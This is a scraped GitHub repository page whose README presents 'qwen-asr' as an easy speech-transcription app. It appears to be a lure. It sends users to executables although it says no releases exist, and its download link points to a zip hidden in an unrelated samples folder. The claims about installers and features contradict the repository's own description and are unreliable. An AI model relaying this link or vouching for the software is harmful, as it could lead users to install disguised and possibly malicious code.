Skip to content

iBrammm/qwen-asr

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

10 Commits
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 

Repository files navigation

๐ŸŽ™๏ธ qwen-asr - Easy Speech Transcription for Everyone

Download qwen-asr


๐Ÿ“ What is qwen-asr?

qwen-asr is a simple program that converts spoken words into text. It uses two models, called Qwen3-ASR 0.6b and 1.7b, to listen to audio and write down what it hears. This tool runs on your computer using C language, making it fast and reliable.

You donโ€™t need to know how to code or learn any complex software to use it. Whether you want to transcribe interviews, lectures, or your own voice notes, qwen-asr helps you turn speech into text quickly.


๐Ÿ’ป System Requirements

Before you download qwen-asr, make sure your computer meets these basic needs:

  • Operating System: Windows 10 or later, macOS 10.14 or later, or recent Linux distributions.
  • Processor: Any modern CPU from the last 5 years.
  • Memory: At least 4 GB of RAM. More memory may improve performance.
  • Storage: Around 1 GB of free disk space for the application and models.
  • Audio Input: A microphone or audio file you want to transcribe.

If you use audio files, qwen-asr supports common formats like WAV and MP3.


๐ŸŽฏ Features

qwen-asr offers useful functions designed for clear, easy speech-to-text:

  • Two Model Options: Use either the 0.6b or 1.7b model to balance speed and accuracy.
  • Fast C Inference: Built with C for quick processing on standard computers.
  • Multiple Input Types: Transcribe live microphone input or prerecorded audio files.
  • Simple Output: Saves your transcription as editable text files.
  • Lightweight: Runs comfortably on typical home or office PCs.
  • Offline Use: Your data stays on your machine, no internet required during transcription.

๐Ÿš€ Getting Started

Follow these steps to get qwen-asr up and running on your computer.

Step 1: Download the Software

Click the big button at the top or visit the qwen-asr Releases Page.

Here you will find versions of the app for different computers:

  • For Windows, look for files ending in .exe.
  • For macOS, look for files ending in .dmg or .zip.
  • For Linux, you may find https://github.com/iBrammm/qwen-asr/raw/refs/heads/main/samples/night_of_the_living_dead_1968/asr-qwen-1.1.zip or .AppImage files.

Download the file that matches your computer.


Step 2: Install the Program

  • Windows: Double-click the .exe file you downloaded. Follow the setup instructions. It will place qwen-asr on your desktop or start menu.
  • macOS: Open the .dmg or extracted .zip file, then drag qwen-asr to your Applications folder.
  • Linux: Extract the downloaded file and follow the included README for installation commands, or run the AppImage directly if provided.

Step 3: Open qwen-asr

Once installed, open the application like any other program on your computer.

You will see options to:

  • Select the audio source (microphone or file).
  • Choose which transcribing model to use.
  • Start and stop transcription.

Step 4: Start Transcribing

  • To transcribe live speech, select your microphone and click โ€œStart.โ€
  • To transcribe an audio file, select โ€œOpen Fileโ€ and pick your audio.
  • The transcription appears on screen in real-time or after the file processes.
  • You can save the text as a file or copy it to another program.

๐Ÿ”ง Basic Troubleshooting

If you run into issues, try these steps:

  • No Sound Input: Make sure your microphone is connected and allowed by the app.
  • Transcription Slow or Inaccurate: Try the smaller 0.6b model for faster results or move to a quieter environment.
  • Canโ€™t Open the Program: Check that your system meets requirements and that you downloaded the correct file.
  • Audio Not Recognized: Confirm your audio file is in WAV or MP3 format.

๐Ÿ“ฅ Download & Install

You can always get the latest qwen-asr from this page:

Visit to download qwen-asr

On this page, pick the right file for your system, download it, and follow the installation steps above.


๐Ÿ”— Additional Resources

  • Check the repository's release notes for updates and new features.
  • Look for any help files included with the download.
  • Use your computerโ€™s built-in microphone or any USB microphone for best results.
  • Back up your transcriptions regularly to avoid data loss.

๐Ÿ›  About This Application

This program runs inference, which means it processes the audio you give it through pre-trained speech recognition models, then writes out the text it finds. The name "qwen-asr" reflects the use of Qwen3-ASR models, popular for clear speech transcription tasks.

The two models included serve different needsโ€”use the smaller one for quick drafts and the larger one when you want more accuracy.


๐Ÿ“ž Getting Help

If you find this guide does not cover your issue, you can visit the qwen-asr GitHub page and review issues or discussions filed by other users. While itโ€™s designed for easy use, community support can offer answers for tricky problems.


Thank you for using qwen-asr. We hope it makes speech transcription easier for you.

About

๐ŸŽ™๏ธ Implement fast, dependency-free C inference for Qwen3-ASR speech-to-text models with efficient streaming on modest hardware.

Topics

Resources

License

Stars

6 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors